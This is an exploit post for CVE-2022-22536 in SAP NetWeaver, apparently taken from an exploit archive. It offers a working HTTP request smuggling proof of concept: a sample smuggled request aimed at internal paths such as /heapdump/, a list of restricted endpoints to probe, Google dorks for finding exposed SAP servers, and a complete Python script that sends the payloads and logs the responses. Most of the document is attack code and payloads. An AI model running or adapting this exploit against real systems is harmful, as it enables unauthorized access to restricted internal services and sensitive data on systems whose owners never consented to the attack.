# Exploit Title: SAPGateBreaker Exploit - CVE-2022-22536 - HTTP Request Smuggling Through SAP's Front Door
# Google Dork: https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit/blob/main/dorks
# Date: Tuesday, April 2, 2025
# Exploit Author: @C41Tx90 - Victor de Queiroz - Beco do Exploit - Elytron Security
# Vendor Homepage: https://community.sap.com/t5/technology-blogs-by-members/remediation-of-cve-2022-22536-request smuggling-and-request-concatenation/ba-p/13528083
# Software Link: https://help.sap.com/docs/SUPPORT_CONTENT/uiwits/3361892375.html
# Version: SAP NetWeaver Application Server ABAP, SAP NetWeaver
Application Server Java, ABAP Platform, SAP Content Server 7.53 and
SAP Web Dispatcher
# Tested on: Red Hat Enterprise Linux (RHEL)
# CVE : 2022-22536
https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit
------
SAPGateBreaker - CVE-2022-22536 HTTP Request Smuggler
Author: @C41Tx90 - Victor de Queiroz | elytronsecurity.com |
becodoexploit.com
----------------------------------------------------------------------------
Target: SAP NetWeaver Application Server
Vulnerability: CVE-2022-22536
Exploit Type: HTTP Request Smuggling (Content-Length-based)
Impact: ACL Bypass, Internal Access
More information and explanations:
https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit
----------------------------------------------------------------------------
Sample Payload:
----------------------------------------------------------------------------
GET /sap/admin/public/default.html HTTP/1.1
Host: 172.32.22.7:50000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0)
Gecko/20100101 Firefox/136.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://172.32.22.7:50000/sap/admin/public/default.html
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Cookie: saplb_*=(J2EE7364720)7364750
Authorization: Basic YTph
Content-Length: 89
0\r
\r
GET /heapdump/ HTTP/1.1\r
Host: 127.0.0.1\r
X-Forwarded-For: 127.0.0.1\r
\r
----------------------------------------------------------------------------
Expected Response:
----------------------------------------------------------------------------
HTTP/1.1 200 OK
server: SAP NetWeaver Application Server
last-modified: Tue, 01 Sep 2020 11:54:39 GMT
sap-cache-control: +3600
date: Tue, 01 Apr 2025 20:49:02 GMT
content-length: 4465
content-type: text/html
connection: Keep-Alive
x-dummy: 0
----------------------------------------------------------------------------
Indicators of Success:
- Status code 200 for internal endpoints
- Difference between direct access (403/404) and smuggled (200)
- Access to otherwise restricted SAP services via loopback injection
----------------------------------------------------------------------------
Example Paths Tested:
- /sap/public/bc/icf/info
- /sap/bc/webdynpro/sap/appl_soap_management
- /heapdump/
- /ctc/ConfigServlet
- /sap/public/bc/icf/logon.html
- /webdynpro/resources/sap.com/tc~lm~config~content/
----------------------------------------------------------------------------
SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
Google Dorks:
intitle:"SAP NetWeaver Application Server Java" inurl:/webdynpro/resources/
intitle:"SAP NetWeaver" "SAP J2EE Engine"
intitle:"Welcome to SAP NetWeaver" inurl:/irj/portal
intitle:"SAP NetWeaver Administrator" inurl:/nwa
inurl:"/sap/bc/webdynpro" -site:sap.com
inurl:"/sap/public" "SAP NetWeaver"
inurl:"/sap/admin/public/default.html"
inurl:"/webdynpro/welcome/Welcome.html"
inurl:"/sap/public/info.jsp"
"Powered by SAP NetWeaver" inurl:sap
intitle:"SAP Web Dispatcher Administration"
----------------------------------------------------------------------------
# Exploit
import argparse
import http.client
from urllib.parse import urlparse
from colorama import Fore, Style, Back, init
import os
init(autoreset=True)
BANNER = f"""
{Fore.WHITE}
+---------------------------+
(\__/\ Breaking the Gate |
{Style.BRIGHT}{Fore.WHITE}by{Style.RESET_ALL}
{Fore.YELLOW}@C41Tx90{Fore.WHITE} |
({Fore.RED}•{Fore.WHITE}デ{Fore.RED}•{Fore.WHITE})
{Style.BRIGHT}{Fore.YELLOW} CVE-2022-22536{Style.RESET_ALL} |
{Fore.GREEN}t.me/becodoxpl{Fore.WHITE} |
/ つ {Fore.WHITE}HTTP Request Smuggler |
{Fore.YELLOW}becodoexploit.com{Fore.WHITE} |
|
{Fore.LIGHTBLUE_EX}elytronsecurity.com{Fore.WHITE} |
+---------------------------+
"""
def detect_sap_version(host, port, is_https):
try:
conn_class = http.client.HTTPSConnection if is_https else
http.client.HTTPConnection
conn = conn_class(host, port, timeout=5)
conn.request("GET", "/")
res = conn.getresponse()
headers = {k.lower(): v for k, v in res.getheaders()}
server_header = headers.get("server", "Unknown")
print(f"{Fore.YELLOW}[*] {Fore.WHITE}Detected SAP Server
Header: {Fore.CYAN}{server_header}\n")
return server_header
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Could not determine SAP
version: {e}\n")
return "Unknown"
def build_smuggled_request(path):
return f"0\r\n\r\nGET {path} HTTP/1.1\r\nHost:
127.0.0.1\r\nX-Forwarded-For: 127.0.0.1\r\nConnection: close\r\n\r\n"
def try_file_read(host, port, is_https, verbose):
test_paths = [
"/sap/public/bc/icf/info",
"/sap/public/info.jsp",
"/sap/public/test/test.jsp",
"/sap/bc/webdynpro/sap/appl_soap_management",
"/sap/public/bc/soap/rfc",
"/webdynpro/welcome/Welcome.html",
"/sr_central",
"/useradmin/.jsp",
"/heapdump/",
"/startPage",
"/crossdomain.xml",
"/ctc/ConfigServlet",
"/webdynpro/resources/sap.com/tc~lm~config~content/",
"/sld",
"/sap/bc/webdynpro/sap/wdy_cfg_component_config",
"/sap/public/bc/icf/logon.html",
"/sap/bc/webdynpro/sap/itadmin",
"/sap/public/bc/sec/saml2",
"/sap/public/bc/webdav"
]
print(f"{Style.BRIGHT}{Fore.RED}[!] {Fore.WHITE}Proof of Concept
for ACL Bypass via HTTP Request Smuggling{Style.RESET_ALL}\n")
for path in test_paths:
try:
conn_class = http.client.HTTPSConnection if is_https else
http.client.HTTPConnection
conn = conn_class(host, port)
conn.request("GET", path)
res_direct = conn.getresponse()
content_direct = res_direct.read().decode(errors="ignore")
direct_status = res_direct.status
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Error checking direct
access for {path}: {e}")
continue
body = build_smuggled_request(path)
headers = {
"Host": f"{host}:{port}",
"Authorization": "Basic YTph",
"Cookie": "saplb_*=(J2EE7364720)7364750",
"Content-Type": "application/json",
"Content-Length": str(len(body.encode("utf-8")))
}
try:
conn = conn_class(host, port)
conn.request("POST", "/sap/admin/public/default.html",
body=body, headers=headers)
res = conn.getresponse()
smuggled_headers = res.getheaders()
content_smuggled = res.read().decode(errors="ignore")
smuggled_status = res.status
status_color = Fore.GREEN if smuggled_status !=
direct_status else Fore.RED
print(f"{status_color}[-] {Fore.LIGHTBLUE_EX}{path}
{Style.BRIGHT}{Fore.WHITE}Direct Access:
{Fore.YELLOW}({direct_status}) {Fore.WHITE}Smuggled Access:
{status_color}({smuggled_status}){Style.RESET_ALL}")
if smuggled_status == direct_status:
print(f"{Fore.RED}[x] {Fore.WHITE}Exploit did not work
for {path}\n")
with open("poc.txt", "a") as f:
f.write(f"\n--- Path: {path} ---\n")
f.write(f"Direct: {direct_status}\nSmuggled:
{smuggled_status}\n")
f.write(f"Smuggled Request:\nPOST
/sap/admin/public/default.html HTTP/1.1\n")
for k, v in headers.items():
f.write(f"{k}: {v}\n")
f.write(f"\n{body}\n")
f.write(f"Smuggled Response Headers:\n")
for h in smuggled_headers:
f.write(f"{h[0]}: {h[1]}\n")
if verbose:
f.write(f"\nSmuggled Response Body:\n{content_smuggled}\n")
f.write(f"\nDirect Response:\n{content_direct}\n")
if verbose:
print(f"\n{Fore.BLUE}>>> Sent Payload to
{path}:{Style.RESET_ALL}")
print(f"{Fore.CYAN}POST
/sap/admin/public/default.html HTTP/1.1")
for k, v in headers.items():
print(f"{Fore.CYAN}{k}: {v}")
print(f"\n{Fore.MAGENTA}{body.strip()}{Style.RESET_ALL}\n")
print(f"{Fore.BLUE}>>> Received Response:{Style.RESET_ALL}")
print(f"{Back.YELLOW if smuggled_status == 500
else Fore.CYAN}{Fore.WHITE}HTTP/1.1
{smuggled_status}{Style.RESET_ALL}")
for h in smuggled_headers:
print(f"{Fore.CYAN}{h[0]}: {h[1]}")
print(f"\n{Fore.CYAN}{content_smuggled}{Style.RESET_ALL}")
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Error smuggling to {path}: {e}")
def send_smuggled_request(target, verbose):
parsed = urlparse(target)
is_https = parsed.scheme == 'https'
port = parsed.port or (443 if is_https else 80)
host = parsed.hostname
print(BANNER)
print(f"{Fore.YELLOW}[*] {Fore.WHITE}Starting CVE-2022-22536
exploitation on {host}:{port}\n")
detect_sap_version(host, port, is_https)
body = build_smuggled_request("/sap/bc/webdynpro/sap/appl_soap_management")
headers = {
"Host": f"{host}:{port}",
"Authorization": "Basic YTph",
"Cookie": "saplb_*=(J2EE7364720)7364750",
"Content-Type": "application/json",
"Content-Length": str(len(body.encode("utf-8")))
}
conn_class = http.client.HTTPSConnection if is_https else
http.client.HTTPConnection
conn = conn_class(host, port)
try:
conn.request("POST", "/sap/admin/public/default.html",
body=body, headers=headers)
res = conn.getresponse()
content = res.read().decode(errors="ignore")
status_display = f"HTTP/{res.version/10:.1f} {res.status} {res.reason}"
is_exploit_success = res.status in [200, 500, 403, 302]
print(f"{Fore.GREEN if is_exploit_success else Fore.RED}[-]
{Fore.WHITE}Exploit executed{' successfully' if is_exploit_success
else ''}! {Fore.YELLOW}CVE-2022-22536")
print(f"{Fore.WHITE}{'-'*60}\n")
print(f"{Fore.BLUE}>>> Sent Payload:{Style.RESET_ALL}")
print(f"{Fore.CYAN}POST /sap/admin/public/default.html HTTP/1.1")
for k, v in headers.items():
print(f"{Fore.CYAN}{k}: {v}")
print(f"\n{Fore.MAGENTA}{body.strip()}{Style.RESET_ALL}\n")
print(f"{Fore.BLUE}>>> Received Response:{Style.RESET_ALL}")
print(f"{Back.YELLOW if res.status == 500 else
Fore.CYAN}{Fore.WHITE}{status_display}{Style.RESET_ALL}")
for h in res.getheaders():
print(f"{Fore.CYAN}{h[0]}: {h[1]}")
if verbose:
print(f"\n{Fore.CYAN}{content}{Style.RESET_ALL}")
with open("poc.txt", "w") as f:
f.write(f"Initial Request:\nPOST
/sap/admin/public/default.html HTTP/1.1\n")
for k, v in headers.items():
f.write(f"{k}: {v}\n")
f.write(f"\n{body}\n")
f.write(f"Initial Response:\n{status_display}\n")
for h in res.getheaders():
f.write(f"{h[0]}: {h[1]}\n")
f.write(f"\n{content}\n")
print("\n")
if is_exploit_success:
print(f"{Fore.GREEN}[=] {Fore.WHITE}The exploit executed
successfully and triggered an internal processing behavior. This
indicates a potential HTTP request smuggling condition.")
else:
print(f"{Fore.RED}[x] {Fore.WHITE}The exploit did not
trigger the expected behavior. Target may not be vulnerable.")
print(f"\n{Fore.WHITE}{'-'*60}\n")
try_file_read(host, port, is_https, verbose)
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Error sending initial request: {e}")
def main():
parser = argparse.ArgumentParser(description="CVE-2022-22536 Smuggling PoC")
parser.add_argument("-u", "--url", required=True, help="Target
full URL (e.g., http://host:port)")
parser.add_argument("--verbose", "-v", action="store_true",
help="Show full headers and responses")
args = parser.parse_args()
os.system('clear')
send_smuggled_request(args.url, args.verbose)
if __name__ == "__main__":
main()
----------------------------------------------------------------------------
https://nvd.nist.gov/vuln/detail/CVE-2022-22536
https://launchpad.support.sap.com/#/notes/3123396
https://blogs.sap.com/2022/02/08/patch-your-sap-netweaver-application-server-asap-cve-2022-22536/Credits and Partners
All rights reserved nPulse.net 2009 - 2025
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD
